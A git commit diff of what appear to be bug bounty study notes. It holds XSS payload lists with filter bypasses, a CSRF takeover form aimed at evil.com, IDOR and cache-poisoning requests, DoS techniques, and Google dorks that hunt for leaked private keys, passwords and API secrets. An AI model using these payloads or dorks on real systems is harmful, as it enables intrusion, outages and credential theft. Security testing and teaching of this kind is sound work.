Grouping, adding recon and some tips

This commit is contained in:
MD15 2021-02-09 09:15:31 +07:00
parent 90979cdbf0
commit 8c337501d1
16 changed files with 2593 additions and 234 deletions

View File

@ -1,49 +0,0 @@
## Account Takeover
1. Using OAuth Misconfiguration
- Victim has a account in evil.com
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
- Attacker changed his/her email to victim email.
- When the victim try to create an account on evil.com, it says the email already exists.
2. Try re-sign up using same email
```
POST /newaccount
[...]
email=victim@mail.com&password=1234
```
After sign up using victim email, try signup again but using different password
```
POST /newaccount
[...]
email=victim@mail.com&password=hacked
```
Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
3. via CSRF
- Create an account as an attacker and fill all the form, check your info in the Account Detail.
- Change the email and capture the request, then created a CSRF Exploit.
- The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victims account.
```html
<html>
<body>
<form action="https://evil.com/user/change-email" method="POST">
<input type="hidden" value="victim@gmail.com"/>
<input type="submit" value="Submit Request">
</form>
</body>
</html>
```
Source: [Link](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
4. Chaining with IDOR, for example
```
POST /changepassword.php
Host: site.com
[...]
userid=500&password=heked123
```
500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
5. No Rate Limit on 2FA

View File

@ -1,65 +1,58 @@
# Business Logic Errors
## **Introduction**
Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
## **How to Find**
1. Review Functionality
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
- Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions.
- Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints.
- Try to post reviews like some other users.
- Try performing CSRF on this functionality, often is not protected by tokens
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
- Try to see if the same user can post multiple ratings for a product. This is an interesting endpoint to check for Race Conditions.
- Try to see if the file upload field is allowing any exts, it's often observed that the devs miss out on implementing protections on such endpoints.
- Try to post reviews like some other users.
- Try performing CSRF on this functionality, often is not protected by tokens
2. Coupon Code Functionality
- Apply the same code more than once to see if the coupon code is reusable.
- If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time.
- Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side.
- Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field
- Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side.
- Apply the same code more than once to see if the coupon code is reusable.
- If the coupon code is uniquely usable, try testing for Race Condition on this function by using the same code for two accounts at a parallel time.
- Try Mass Assignment or HTTP Parameter Pollution to see if you can add multiple coupon codes while the application only accepts one code from the Client Side.
- Try performing attacks that are caused by missing input sanitization such as XSS, SQLi, etc. on this field
- Try adding discount codes on the products which are not covered under discounted items by tampering with the request on the server-side.
3. Delivery Charges Abuse
- Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced.
- Try checking for the free delivery by tampering with the params.
- Try tampering with the delivery charge rates to -ve values to see if the final amount can be reduced.
- Try checking for the free delivery by tampering with the params.
4. Currency Arbitrage
- Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount.
- Pay in 1 currency say USD and try to get a refund in EUR. Due to the diff in conversion rates, it might be possible to gain more amount.
5. Premium Feature Abuse
- Try forcefully browsing the areas or some particular endpoints which come under premium accounts.
- Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue.
- Some applications use true-false request/response values to validate if a user is having access to premium features or not.
- Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features.
- Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not.
- Try forcefully browsing the areas or some particular endpoints which come under premium accounts.
- Pay for a premium feature and cancel your subscription. If you get a refund but the feature is still usable, it's a monetary impact issue.
- Some applications use true-false request/response values to validate if a user is having access to premium features or not.
- Try using Burp's Match & Replace to see if you can replace these values whenever you browse the app & access the premium features.
- Always check cookies or local storage to see if any variable is checking if the user should have access to premium features or not.
6. Refund Feature Abuse
- Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible.
- Try for currency arbitrage explained yesterday.
- Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds.
- Purchase a product (usually some subscription) and ask for a refund to see if the feature is still accessible.
- Try for currency arbitrage explained yesterday.
- Try making multiple requests for subscription cancellation (race conditions) to see if you can get multiple refunds.
7. Cart/Wishlist Abuse
- Add a product in negative quantity with other products in positive quantity to balance the amount.
- Add a product in more than the available quantity.
- Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there.
- Add a product in negative quantity with other products in positive quantity to balance the amount.
- Add a product in more than the available quantity.
- Try to see when you add a product to your wishlist and move it to a cart if it is possible to move it to some other user's cart or delete it from there.
8. Thread Comment Functionality
- Unlimited Comments on a thread
- Suppose a user can comment only once, try race conditions here to see if multiple comments are possible.
- Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity.
- Try posting comments impersonating some other users.
- Unlimited Comments on a thread
- Suppose a user can comment only once, try race conditions here to see if multiple comments are possible.
- Suppose there is an option: comment by the verified user (or some privileged user) try to tamper with various parameters in order to see if you can do this activity.
- Try posting comments impersonating some other users.
9. Parameter Tampering
- Tamper Payment or Critical Fields to manipulate their values
- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
- Response Manipulation to bypass certain restrictions such as 2FA Bypass
- Tamper Payment or Critical Fields to manipulate their values
- Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment
- Response Manipulation to bypass certain restrictions such as 2FA Bypass
10. App Implementation Logic Abuse
- If an app accepts JSON data, try changing content type to XML and see if the XML data is being processed, it can be left vulnerable to XXE or XML-based attacks.
- If an application is using the DELETE method to delete a resource but there is no CSRF protection, try converting the method to GET/POST and add an additional parameter like ?method=delete
- In the above case if any user ID is going in the request, try bypassing method-based restrictions by adding parameters like X-Method-Override.
- If you see a UUID, try to replace with similar mapping such as 1,2,3.. often UUID mapping is accepted by the applications.
- Try the HEAD method to bypass the authentication restrictions.
11. Denial of Service Situations
- Resource Exhaustion
- Weak Account Lockout Mechanisms
- Kicking out a user/banning a user somehow from accessing the application.
- Application Level DoS by abusing the various functionalities present within the application.
Source: [@harshbothra_](https://twitter.com/harshbothra_)
Reference:
- [@harshbothra_](https://twitter.com/harshbothra_)

View File

@ -1,4 +1,18 @@
# XSS Cheat Sheet (Basic)
## **Introduction**
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack:
- Reflected XSS
Attack where the malicious script runs from another website through the web browser
- Stored XSS
Stored attacks are those where the injected script is permanently stored on the target servers
- DOM-Based XSS
A type of XSS that has payloads found in the DOM rather than within the HTML code.
## **Payloads**
1. Basic payload
```html
<script>alert(1)</script>
@ -89,7 +103,7 @@
</script>
```
# XSS Cheat Sheet (Advanced)
## **XSS Cheat Sheet (Advanced)**
7. Use when input lands in a script block, inside a string delimited value.
```html
'-alert(1)-'
@ -274,7 +288,7 @@ $ exiftool -Artist='"><script>alert(1)</script>' dapos.jpeg
> Add a "]]>" if input lands in a CDATA section
# XSS Cheat Sheet (Bypass)
## **XSS Cheat Sheet (Bypass)**
19. Mixed Case
```html
<Script>alert(document.cookie)</Script>
@ -320,4 +334,7 @@ javascript://%250Aalert(1)
26. Inside Comments Bypass
```html
<!--><svg onload=alert(1)-->
```
```
Reference:
- [Brute Logic](https://brutelogic.com.br/)

View File

@ -1,46 +1,33 @@
# Denial of Service
1. Cookie bomb
```
https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
```
After input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
## **Introduction**
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
## **How to Find**
References: [Hackerone #105363](https://hackerone.com/reports/105363)
1. Cookie bomb
```
https://target.com/index.php?param1=xxxxxxxxxxxxxx
```
After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable
2. Try input a very long payload to form. For example using very long password or using very long email
```
POST /Register
[...]
```
POST /Register
[...]
username=victim&password=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
```
username=victim&password=aaaaaaaaaaaaaaa
```
References: [Hackerone #840598](https://hackerone.com/reports/840598)
3. Cache poisoning, can using header "X-Forwarded-Port" or "X-Forwarded-Host"
```
curl -H "X-Forwarded-Port: 123" https://target.com/index.php?poison=1
```
```
curl -H "X-Forwarded-Host: target.com:123" https://target.com/index.php?poison=1
```
Reference: [Hackerone #409370](https://hackerone.com/reports/409370)
4. Pixel flood, using image with a huge pixels
3. Pixel flood, using image with a huge pixels
Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0)
References: [Hackerone #390](https://hackerone.com/reports/390)
5. Frame flood, using GIF with a huge frame
4. Frame flood, using GIF with a huge frame
Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5)
References: [Hackerone #400](https://hackerone.com/reports/400)
6. Sometimes in website we found a parameter that can adjust the size of the image, for example
5. Sometimes in website we found a parameter that can adjust the size of the image, for example
```
https://target.com/img/vulnerable.jpg?width=500&height=500
```
@ -49,24 +36,16 @@ Try change "500" to "99999999999"
https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999
```
References: [Hackerone #751904](https://hackerone.com/reports/751904)
7. Try changing the value of the header with something new, for example:
6. Try changing the value of the header with something new, for example:
```
Accept-Encoding: gzip, gzip, deflate, br, br
```
References: [Hackerone #861170](https://hackerone.com/reports/861170)
7. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests
8. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests
8. ReDoS (Regex DoS) occurs due to poorly implemented RegEx
References: [Hackerone #892615](https://hackerone.com/reports/892615)
9. ReDoS (Regex DoS) occurs due to poorly implemented RegEx
References: [Hackerone #511381](https://hackerone.com/reports/511381)
10. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/))
9. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/))
- HTTP Header Oversize (HHO)
A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache
@ -123,6 +102,7 @@ References: [Hackerone #511381](https://hackerone.com/reports/511381)
Host: www.hackerone.com
X-Forwarded-Port: 123
```
- X-Forwarded-Host
```
GET /index.php?dontpoisoneveryone=1 HTTP/1.1
@ -133,5 +113,13 @@ References: [Hackerone #511381](https://hackerone.com/reports/511381)
![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png)
References:
- [Hackerone #840598](https://hackerone.com/reports/840598)
- [Hackerone #105363](https://hackerone.com/reports/105363)
- [Hackerone #390](https://hackerone.com/reports/390)
- [Hackerone #400](https://hackerone.com/reports/400)
- [Hackerone #751904](https://hackerone.com/reports/751904)
- [Hackerone #861170](https://hackerone.com/reports/861170)
- [Hackerone #892615](https://hackerone.com/reports/892615)
- [Hackerone #511381](https://hackerone.com/reports/511381)
- [Hackerone #409370](https://hackerone.com/reports/409370)
- [CPDoS](https://cpdos.org/)

View File

@ -1,5 +1,9 @@
# Exposed Source Code
## **Introduction**
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
## **How to Find**
1. Exposed Git folder
```
https://site.com/.git
@ -22,4 +26,7 @@ https://site.com/.hg
```
http://target.com/.bzr
```
![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png)
Reference:
- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html)

View File

@ -1,5 +1,10 @@
# Host Header Injection
## **Introduction**
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
## **How to Find**
1. Change the host header
```
GET /index.php HTTP/1.1
@ -42,4 +47,5 @@ GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...
```
Source: https://portswigger.net/web-security/host-header/exploiting
Reference:
- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)

View File

@ -1,103 +1,102 @@
## IDOR (Insecure Direct Object Reference)
# Insecure Direct Object Reference (IDOR)
## **Introduction**
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
## **How to Find**
1. Add parameters onto the endpoints for example, if there was
```html
```
GET /api/v1/getuser
[...]
```
Try this to bypass
```html
```
GET /api/v1/getuser?id=1234
[...]
```
2. HTTP Parameter pollution
```html
```
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
```
3. Add .json to the endpoint
```html
```
GET /v2/GetData/1234
[...]
```
Try this to bypass
```html
```
GET /v2/GetData/1234.json
[...]
```
4. Test on outdated API Versions
```html
```
POST /v2/GetData
[...]
id=123
```
Try this to bypass
```html
```
POST /v1/GetData
[...]
id=123
```
5. Wrap the ID with an array.
```html
```
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
```html
```
POST /api/get_profile
[...]
{"id":[111]}
```
6. Wrap the ID with a JSON object
```html
```
POST /api/get_profile
[...]
{"user_id":111}
```
Try this to bypass
```html
```
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
```
7. JSON Parameter Pollution
```html
```
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
```
8. Try decode the ID, if the ID encoded using md5,base64,etc
```html
```
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
```
dmljdGltQG1haWwuY29t => victim@mail.com
9. If the website using graphql, try to find IDOR using graphql!
```html
```
GET /graphql
[...]
```
```html
```
GET /graphql.php?query=
[...]
```
10. MFLAC (Missing Function Level Access Control)
10. MFLAC (Missing Function Level Access Control)
```
GET /admin/profile
```
@ -106,4 +105,5 @@ Try this to bypass
GET /ADMIN/profile
```
Source: [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup!
Reference:
- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup

56
Misc/Account Takeover.md Normal file
View File

@ -0,0 +1,56 @@
# Account Takeover
## **Introduction**
Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
## **How to Find**
1. Using OAuth Misconfiguration
- Victim has a account in evil.com
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
- Attacker changed his/her email to victim email.
- When the victim try to create an account on evil.com, it says the email already exists.
2. Try re-sign up using same email
```
POST /newaccount
[...]
email=victim@mail.com&password=1234
```
After sign up using victim email, try signup again but using different password
```
POST /newaccount
[...]
email=victim@mail.com&password=hacked
```
3. via CSRF
- Create an account as an attacker and fill all the form, check your info in the Account Detail.
- Change the email and capture the request, then created a CSRF Exploit.
- The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victims account.
```html
<html>
<body>
<form action="https://evil.com/user/change-email" method="POST">
<input type="hidden" value="victim@gmail.com"/>
<input type="submit" value="Submit Request">
</form>
</body>
</html>
```
4. Chaining with IDOR, for example
```
POST /changepassword.php
Host: site.com
[...]
userid=500&password=heked123
```
500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
5. No Rate Limit on 2FA
References:
- [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3)
- [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526)
- [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f)

View File

@ -0,0 +1,16 @@
# Broken Link Hijacking
## **Introduction**
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
## **How to Find**
1. Manually find external links on the target site (For example, check some links to social media accounts)
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
```
blc -rof --filter-level 3 https://vuln.com/
```
References:
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
- [How I was able to takeover the companys LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d)

View File

@ -2,14 +2,12 @@
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
## List
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
## List Bypass
@ -28,72 +26,14 @@ These are my bug bounty notes that I have gathered from various sources, you can
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
## Miscellaneous
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
## Reconnaissance
* ### __Small Scope__
Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
- [x] Directory Enumeration
- [x] Technology Fingerprinting
- [x] Port Scanning
- [x] Parameter Fuzzing
- [x] Wayback History
- [x] Known Vulnerabilities
- [x] Hardcoded Information in JavaScript
- [x] Domain Specific GitHub & Google Dorking
- [x] Broken Link Hijacking
- [x] Data Breach Analysis
- [x] Misconfigured Cloud Storage
* ### __Medium Scope__
Usually the scope is wild card scope where all the subdomains are part of scope
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
* ### __Large Scope__
Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.)
- [x] Subsidiary & Acquisition Enumeration (Depth Max)
- [x] Reverse Lookup
- [x] ASN & IP Space Enumeration and Service Identification
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
- [x] Directory Enumeration
- [x] Hardcoded Information in JavaScript
- [x] GitHub Reconnaissance
- [x] Google Dorking
- [x] Data Breach Analysis
- [x] Parameter Fuzzing
- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
- [x] IP Range Enumeration (If in Scope)
- [x] Wayback History
- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
- [x] Heartbleed Scanning
- [x] General Security Misconfiguration Scanning
- [x] And any possible Recon Vector (Network/Web) can be applied.
Source: [Link](https://www.xmind.net/m/hKKexj/)
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
- [Github Dorks](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Github%20Dorks.md)
- [Google Dorks](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Google%20Dorks.md)
- [Shodan Dorks](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Shodan%20Dorks.md)
## Coming Soon!

1516
Recon/Github Dorks.md Normal file

File diff suppressed because it is too large Load Diff

35
Recon/Google Dorks.md Normal file
View File

@ -0,0 +1,35 @@
# Google Dorks
## List
- inurl:example.com intitle:"index of"
- inurl:example.com intitle:"index of /" "*key.pem"
- inurl:example.com ext:log
- inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
- inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
- inurl:example.com intitle:"index of" "config.db"
- inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml
- inurl:example.com intext:admin ext:sql inurl:admin
- inurl:example.com allintext:username,password filetype:log
site:example.com "-----BEGIN RSA PRIVATE KEY-----" - inurl:id_rsa
- site:codepad.co "keyword"
- site:scribd.com "keyword"
- site:npmjs.com "keyword"
- site:npm-runkit.com "keyword"
- site:libraries.io "keyword"
- site:ycombinator.io "keyword"
- site:coggle.it "keyword"
- site:papaly.com "keyword"
- site:google.com "keyword"
- site:trello.com "keyword"
- site:prezi.com "keyword"
- site:jsdelivr.net "keyword"
- site:codepen.io "keyword"
- site:codeshare.io "keyword"
- site:sharecode.io "keyword"
- site:pastebin.com "keyword"
- site:repl.it "keyword"
- site:productforums.google.com "keyword"
- site:gitter.im "keyword"
- site:bitbucket.org "keyword"
- site:*atlassian.net "keyword"
- inurl:gitlab "keyword"
- inurl:github "keyword"

64
Recon/Scope.md Normal file
View File

@ -0,0 +1,64 @@
* ### __Small Scope__
Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
- [x] Directory Enumeration
- [x] Technology Fingerprinting
- [x] Port Scanning
- [x] Parameter Fuzzing
- [x] Wayback History
- [x] Known Vulnerabilities
- [x] Hardcoded Information in JavaScript
- [x] Domain Specific GitHub & Google Dorking
- [x] Broken Link Hijacking
- [x] Data Breach Analysis
- [x] Misconfigured Cloud Storage
* ### __Medium Scope__
Usually the scope is wild card scope where all the subdomains are part of scope
- [x] Subdomain Enumeration
- [x] Subdomain Takeover
- [x] Probing & Technology Fingerprinting
- [x] Port Scanning
- [x] Known Vulnerabilities
- [x] Template Based Scanning (Nuclei/Jeales)
- [x] Misconfigured Cloud Storage
- [x] Broken Link Hijacking
